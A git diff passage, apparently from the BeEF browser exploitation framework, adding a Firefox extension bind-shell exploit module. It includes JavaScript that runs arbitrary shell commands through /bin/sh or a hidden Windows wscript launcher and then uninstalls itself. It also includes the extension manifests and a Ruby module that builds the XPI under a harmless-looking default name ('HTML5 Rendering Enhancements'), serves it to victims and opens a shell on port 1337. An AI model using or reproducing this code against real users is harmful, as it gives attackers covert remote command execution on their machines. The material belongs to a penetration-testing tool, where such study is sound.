+          var file = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+          file.initWithPath(path);
+
+          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
+                           .createInstance(Components.interfaces.nsIFileInputStream);
+          fileStream.init(file, 1, 0, false);
+
+          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
+                             .createInstance(Components.interfaces.nsIBinaryInputStream);
+          binaryStream.setInputStream(fileStream);
+          var array = binaryStream.readByteArray(fileStream.available());
+
+          binaryStream.close();
+          fileStream.close();
+          file.remove(true);
+
+          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
+        } catch (e) { return ""; }
+      };
+    
+      
+      var setTimeout = function(cb, delay) {
+        var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
+        timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
+        return timer;
+      };
+    
+
+      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
+        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+      var windows = (ua.indexOf("Windows")>-1);
+      var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
+      var jscript = ({"src":"\n      var b64 = WScript.arguments(0);\n      var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n      var el  = dom.createElement(\"root\");\n      el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n      var stream = new ActiveXObject(\"ADODB.Stream\");\n      stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n      stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n      var cmd = stream.ReadText();\n      (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n    "}).src;
+      var runCmd = function(cmd, cb) {
+        cb = cb || (function(){});
+
+        if (cmd.trim().length == 0) {
+          setTimeout(function(){ cb("Command is empty string ('')."); });
+          return;
+        }
+
+        var js = (/^\s*\[JAVASCRIPT\]([\s\S]*)\[\/JAVASCRIPT\]/g).exec(cmd.trim());
+        if (js) {
+          var tag = "[!JAVASCRIPT]";
+          var sync = true;  // avoid zalgo's reach
+          var sent = false;
+          var retVal = null;
+
+          try {
+            retVal = Function('send', js[1])(function(r){
+              if (sent) return;
+              sent = true
+              if (r) {
+                if (sync) setTimeout(function(){ cb(false, r+tag+"\n"); });
+                else      cb(false, r+tag+"\n");
+              }
+            });
+          } catch (e) { retVal = e.message; }
+
+          sync = false;
+
+          if (retVal && !sent) {
+            sent = true;
+            setTimeout(function(){ cb(false, retVal+tag+"\n"); });
+          }
+
+          return;
+        }
+
+        var shEsc = "\\$&";
+        var shPath = "/bin/sh -c"
+
+        if (windows) {
+          shPath = "cmd /c";
+          shEsc = "\^$&";
+          var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
+            .getService(Components.interfaces.nsIProperties)
+            .get("TmpD", Components.interfaces.nsIFile);
+          jscriptFile.append('I5yOzt1neFMfjSYjyY.js');
+          var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
+            .createInstance(Components.interfaces.nsIFileOutputStream);
+          stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0);
+          stream.write(jscript, jscript.length);
+          if (stream instanceof Components.interfaces.nsISafeOutputStream) {
+            stream.finish();
+          } else {
+            stream.close();
+          }
+        }
+
+        var stdoutFile = "JKsYPvN0AOYtet5mnB";
+
+        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stdout.append(stdoutFile);
+
+        if (windows) {
+          var shell = shPath+" "+cmd;
+          shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1";
+          var b64 = svcs.btoa(shell);
+        } else {
+          var shell = shPath+" "+cmd.replace(/\W/g, shEsc);
+          shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1";
+        }
+        var process = Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
+        var sh = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+
+        if (windows) {
+          sh.initWithPath("C:\\Windows\\System32\\wscript.exe");
+          process.init(sh);
+          var args = [jscriptFile.path, b64];
+          process.run(true, args, args.length);
+          jscriptFile.remove(true);
+          setTimeout(function(){cb(false, cmd+"\n"+readFile(stdout.path));});
+        } else {
+          sh.initWithPath("/bin/sh");
+          process.init(sh);
+          var args = ["-c", shell];
+          process.run(true, args, args.length);
+          setTimeout(function(){cb(false, readFile(stdout.path));});
+        }
+      };
+    
+
+      serverSocket.asyncListen(listener);
+    })();
+
+
+  try { // Fx < 4.0
+    Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
+  } catch (e) {}
+  try { // Fx 4.0 and later
+    Components.utils.import("resource://gre/modules/AddonManager.jsm");
+    AddonManager.getAddonByID(xpi_guid, function(addon) {
+      addon.uninstall();
+    });
+  } catch (e) {}
+      }
diff --git a/modules/exploits/local_host/firefox_extension_bindshell/extension/build/readme.txt b/modules/exploits/local_host/firefox_extension_bindshell/extension/build/readme.txt
new file mode 100644
index 000000000..9aa47d25d
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_bindshell/extension/build/readme.txt
@@ -0,0 +1 @@
+This is a temp directory where the Firefox extension will be built.
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_bindshell/extension/chrome.manifest b/modules/exploits/local_host/firefox_extension_bindshell/extension/chrome.manifest
new file mode 100644
index 000000000..2864216f5
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_bindshell/extension/chrome.manifest
@@ -0,0 +1,2 @@
+content	{861fb387-92ce-bb0a-cb48-4b923dbc292b}	./
+overlay	chrome://browser/content/browser.xul	chrome://{861fb387-92ce-bb0a-cb48-4b923dbc292b}/content/overlay.xul
diff --git a/modules/exploits/local_host/firefox_extension_bindshell/extension/install.rdf b/modules/exploits/local_host/firefox_extension_bindshell/extension/install.rdf
new file mode 100644
index 000000000..0813095d0
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_bindshell/extension/install.rdf
@@ -0,0 +1,24 @@
+<?xml version="1.0"?>
+<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
+  <Description about="urn:mozilla:install-manifest">
+    <em:id>{861fb387-92ce-bb0a-cb48-4b923dbc292b}</em:id>
+    <em:name>__extension_name_placeholder__</em:name>
+    <em:version>1.0</em:version>
+    <em:bootstrap>true</em:bootstrap>
+    <em:unpack>true</em:unpack>
+    <em:targetApplication>
+      <Description>
+        <em:id>toolkit@mozilla.org</em:id>
+        <em:minVersion>1.0</em:minVersion>
+        <em:maxVersion>*</em:maxVersion>
+      </Description>
+    </em:targetApplication>
+    <em:targetApplication>
+      <Description>
+        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
+        <em:minVersion>1.0</em:minVersion>
+        <em:maxVersion>*</em:maxVersion>
+      </Description>
+    </em:targetApplication>
+    </Description>
+</RDF>
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_bindshell/extension/overlay.xul b/modules/exploits/local_host/firefox_extension_bindshell/extension/overlay.xul
new file mode 100644
index 000000000..91ca363e4
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_bindshell/extension/overlay.xul
@@ -0,0 +1,5 @@
+<?xml version="1.0"?>
+<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
+  <script src="bootstrap.js"/>
+  <script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
+</overlay>
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_bindshell/module.rb b/modules/exploits/local_host/firefox_extension_bindshell/module.rb
new file mode 100644
index 000000000..179d43901
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_bindshell/module.rb
@@ -0,0 +1,86 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Firefox_extension_bindshell < BeEF::Core::Command
+
+  class Bind_extension < BeEF::Core::Router::Router
+    before do
+      headers 'Content-Type' => 'application/x-xpinstall',
+              'Pragma' => 'no-cache',
+              'Cache-Control' => 'no-cache',
+              'Expires' => '0'
+    end
+
+    get '/' do
+      response['Content-Type'] = "application/x-xpinstall"
+      extension_path = settings.extension_path
+      print_info "Serving malicious Firefox Extension (Bindshell): #{extension_path}"
+      send_file "#{extension_path}",
+                :type => 'application/x-xpinstall',
+                :disposition => 'inline'
+    end
+  end
+
+  def pre_send
+
+    # gets the value configured in the module configuration by the user
+    @datastore.each do |input|
+       if input['name'] == "extension_name"
+          @extension_name = input['value']
+       end
+       if input['name'] == "xpi_name"
+          @xpi_name = input['value']
+       end
+       if input['name'] == "lport"
+          @lport = input['value']
+       end
+    end
+
+    mod_path = "#{$root_dir}/modules/exploits/local_host/firefox_extension_bindshell"
+    extension_path = mod_path + "/extension"
+
+    # clean the build directory
+    FileUtils.rm_rf("#{extension_path}/build/.", secure: true)
+
+    # copy in the build directory necessary file, substituting placeholders
+    File.open(extension_path + "/build/install.rdf", "w")     {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)}
+    File.open(extension_path + "/build/bootstrap.js", "w")    {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__bindshell_port_placeholder__", @lport)}
+    File.open(extension_path + "/build/overlay.xul", "w")     {|file| file.puts File.read(extension_path + "/overlay.xul")}
+    File.open(extension_path + "/build/chrome.manifest", "w") {|file| file.puts File.read(extension_path + "/chrome.manifest")}
+
+    extension_content = ["install.rdf", "bootstrap.js", "overlay.xul", "chrome.manifest"]
+
+    # create the XPI extension container
+    xpi = "#{extension_path}/#{@xpi_name}.xpi"
+    if File.exist?(xpi)
+       File.delete(xpi)
+    end
+    Zip::File.open(xpi, Zip::File::CREATE) do |xpi|
+      extension_content.each do |filename|
+        xpi.add(filename, "#{extension_path}/build/#{filename}")
+      end
+    end
+
+    # mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specific content-type/disposition)
+    bind_extension = Firefox_extension_bindshell::Bind_extension
+    bind_extension.set :extension_path, "#{$root_dir}/modules/exploits/local_host/firefox_extension_bindshell/extension/#{@xpi_name}.xpi"
+    BeEF::Core::Server.instance.mount("/#{@xpi_name}.xpi", bind_extension.new)
+    BeEF::Core::Server.instance.remap
+  end
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    return [
+        {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
+        {'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},
+        {'name' => 'lport', 'ui_label' => 'Listen Port', 'value' => '1337'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+end